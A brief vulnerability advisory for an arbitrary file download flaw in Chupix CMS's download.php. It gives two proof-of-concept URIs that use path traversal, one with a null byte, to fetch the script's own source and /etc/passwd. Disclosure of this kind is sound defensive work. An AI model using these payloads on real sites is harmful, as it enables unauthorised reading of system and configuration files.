Chupix CMS download.php Arbitrary File Download Vulnerability

Chupix CMS download.php Arbitrary File Download Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

/download.php?repertoire=defaut&fichier=../../download.php
/download.php?fichier=../../../../../../../etc/passwd%00